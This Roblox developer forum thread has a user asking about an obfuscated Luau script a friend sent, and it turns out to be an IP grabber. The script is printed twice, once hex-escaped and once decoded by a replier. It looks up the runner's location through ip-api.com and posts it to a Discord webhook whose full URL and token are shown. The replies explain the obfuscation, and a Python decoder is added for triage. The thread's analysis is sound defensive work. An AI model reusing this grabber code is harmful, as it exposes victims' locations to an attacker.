Help understanding malicious attempt to get my location

Hey there, I’m very inexperienced in anything scripting related that’s external to Roblox. My friend sent me an rbxm with this code and I wanted to make sure it doesn’t actually work. Could anybody give me a basic understanding of what this code does?

local n = game:GetService(“\x48\x74\x74\x70\x53\x65\x72\x76\x69\x63\x65”)
local j = “https://discord.com/api/webhooks/1272370779849228339/Fq1YPo2VWSULOqEuP1xH9-wNt0Yu7daMA3NI4dwJCbUYdcxibC2NZ9r_QjVX3NzuVcuG
local _ = “\x68\x74\x74\x70\x3A\x2F\x2F\x69\x70\x2D\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x6A\x73\x6F\x6E”
local _ = n:GetAsync()
local g = n:JSONDecode(
)
local m = script.Parent.Name
local l = m…“\x27\x73\x20\x49\x6E\x66\x6F\x72\x6D\x61\x74\x69\x6F\x6E\x3A\n”
local i = “\n\x43\x6F\x75\x6E\x74\x72\x79\x3A\x20”…g.country
local k = “\n\x52\x65\x67\x69\x6F\x6E\x20\x26\x20\x52\x65\x67\x69\x6F\x6E\x20\x4E\x61\x6D\x65\x3A\x20”…g.region…“\x2C\x20”…g.regionName
local h = “\n\x43\x69\x74\x79\x3A\x20”…g.city
local b = “\n\x5A\x69\x70\x43\x6F\x64\x65\x3A\x20”…g.zip
local a = “\n\x4C\x61\x74\x69\x74\x75\x64\x65\x3A\x20”…g.lat
local _ = “\n\x4C\x6F\x6E\x67\x69\x74\x75\x64\x65\x3A\x20”…g.lon
local c = “\n\x54\x69\x6D\x65\x20\x5A\x6F\x6E\x65\x3A\x20”…g.timezone
local e = “\n\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x53\x65\x72\x76\x69\x63\x65\x20\x50\x72\x6F\x76\x69\x64\x65\x72\x3A\x20”…g.isp
local d = “\n\x4F\x72\x67\x61\x6E\x69\x7A\x61\x74\x69\x6F\x6E\x3A\x20”…g.org
local f = “\n\x41\x2F\x53\x3A\x20”…g.as
local g = “\n\x51\x75\x65\x72\x79\x20\x28\x49\x50\x29\x3A\x20”…g.query
local _ = {
[“\x65\x6D\x62\x65\x64\x73”] = {
{
[“\x74\x69\x74\x6C\x65”] = “\x2A\x2A”…m…“\x2A\x2A”,
[“\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E”] = l…i…k…h…b…a……c…e…d…f…g,
[“\x74\x79\x70\x65”] = “\x72\x69\x63\x68”,
[“\x63\x6F\x6C\x6F\x72”] = tonumber(3066993)
}
}
}
n:PostAsync(j, n:JSONEncode(
))

1 Like

idrk if that works or not, but you did just leak the webhook lol

it sends a get request to http://ip-api.com/json and just sends all information from that api to a discord webhook

local L_1_ = game:GetService("HttpService")
local L_2_ = "https://discord.com/api/webhooks/1272370779849228339/Fq1YPo2VWSULOqEuP1xH9-wNt0Yu7daMA3NI4dwJCbUYdcxibC2NZ9r_QjVX3NzuVcuG"
local L_3_ = "http://ip-api.com/json"
local L_4_ = L_1_:GetAsync()
local L_5_ = L_1_:JSONDecode()
local L_6_ = script.Parent.Name;
local L_7_ = L_6_ .. "'s Information:"
local L_8_ = "Country: " .. L_5_.country;
local L_9_ = "Region & Region Name: " .. L_5_.region .. ", " .. L_5_.regionName;
local L_10_ = "City: " .. L_5_.city;
local L_11_ = "ZipCode: " .. L_5_.zip;
local L_12_ = "Latitude: " .. L_5_.lat;
local L_13_ = "Longitude: " .. L_5_.lon;
local L_14_ = "Time Zone: " .. L_5_.timezone;
local L_15_ = "Internet Service Provider: " .. L_5_.isp;
local L_16_ = "Organization: " .. L_5_.org;
local L_17_ = "A/S: " .. L_5_.as;
local L_18_ = "Query (IP): " .. L_5_.query;
local L_19_ = {
	["embeds"] = {
		{
			["title"] = "**" .. L_6_ .. "**",
			["description"] = L_7_ .. L_8_ .. L_9_ .. L_10_ .. L_11_ .. L_12_ .. L_14_ .. L_15_ .. L_16_ .. L_17_ .. L_18_,
			["type"] = "rich",
			["color"] = tonumber(3066993)
		}
	}
}
L_1_:PostAsync(L_2_, L_1_:JSONEncode())

2 Likes

Read up on ASCII

Basically it’s just using an escape character (\x) and then they’re adding the hexadecimal value of a character (letter)

So it eventually ends up forming variables etc

For example:

\x65 = e

(65 represents the letter e in hexadecimal form)

But you wouldn’t even need to do any sort of decoding because they flat out have “PostAsync” at the end which should tell you what’s going on

And all of this stuff just uses an API to get a whole bunch of location stuff off of you to send to them

You should ask them if they’ve run the code yet to make sure they’re safe

1 Like
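Added example, not part of any post in this thread: a small static triage script that decodes `\xNN` escapes in a Luau source file without running it and reports what the decoded strings reveal. The two hex-escaped literals and the call lines in the sample are copied from the script in the question; the webhook URL is a placeholder, and the function names `decode_hex_escapes` and `triage` are assumptions made for this sketch.

```python
import re

# Sample input: hex-escaped literals and call lines as posted in the question.
# The webhook URL is a placeholder, not a real endpoint.
SAMPLE = r'''
local n = game:GetService("\x48\x74\x74\x70\x53\x65\x72\x76\x69\x63\x65")
local j = "https://discord.com/api/webhooks/<WEBHOOK_ID>/<WEBHOOK_TOKEN>"
local _ = "\x68\x74\x74\x70\x3A\x2F\x2F\x69\x70\x2D\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x6A\x73\x6F\x6E"
local _ = n:GetAsync()
n:PostAsync(j, n:JSONEncode())
'''

HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')   # double-quoted literals only
URL = re.compile(r'https?://[^\s"\']+')
NETWORK_CALLS = ("GetAsync", "PostAsync", "RequestAsync")  # HttpService methods


def decode_hex_escapes(text):
    """Replace each \\xNN escape with the character it encodes.

    Only \\xNN is handled; Luau also accepts decimal (\\104) and \\u{...}
    escapes, which an obfuscator could use instead.
    """
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def triage(source):
    """Statically summarise what an obfuscated script would talk to."""
    raw = STRING_LITERAL.findall(source)
    decoded = [decode_hex_escapes(s) for s in raw]
    urls = sorted({u for s in decoded for u in URL.findall(s)})
    return {
        "hex_escaped_literals": sum(1 for s in raw if HEX_ESCAPE.search(s)),
        "decoded_strings": decoded,
        "urls": urls,
        "uses_http_service": "HttpService" in decoded,
        "network_calls": [c for c in NETWORK_CALLS
                          if re.search(r":" + c + r"\s*\(", source)],
        "webhook": any("discord.com/api/webhooks/" in u for u in urls),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

A script that combines `HttpService`, an outbound URL and a `PostAsync` call behind escaped strings is worth reading in full before it is ever executed in Studio.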

just seems like a simple ip grabber that sends information to a webhook, if you want you can just spam the webhook and it’ll eventually ban itself

Unless Roblox blocks some features of HTTPS requests, that should work.

HTTPS requests require IP addresses. If the HTTPS request is sent from the client (which can probably only be done in Studio), the HTTPS request contains information about the IP address and therefore the location of the sender (without a VPN).

Generally don’t run any obfuscated code (which is what all the L_15 stuff is). People who hide what their code does rarely have good intentions.

or just do this

2 Likes

plus you should be fine, the webhook isn’t even active anymore

I’m the one who ran it :skull: appreciate the help though, just hope they won’t do anything bad with it… I need to educate myself further on what’s possible on Roblox :sob: rlly appreciate it tho

2 Likes

I actually clicked on the webhook after I ran the game and it was active, it had lots more information but then I refreshed and it all disappeared…

If the web hook was still up when you executed the code uhhh ion know if you’re in trouble or not

1 Like

I’m 99% sure they got the information which sucks dude, I just need to hope they don’t have any malicious intent… they said they were just testing if it works on me, but I’m still very skeptical

1 Like
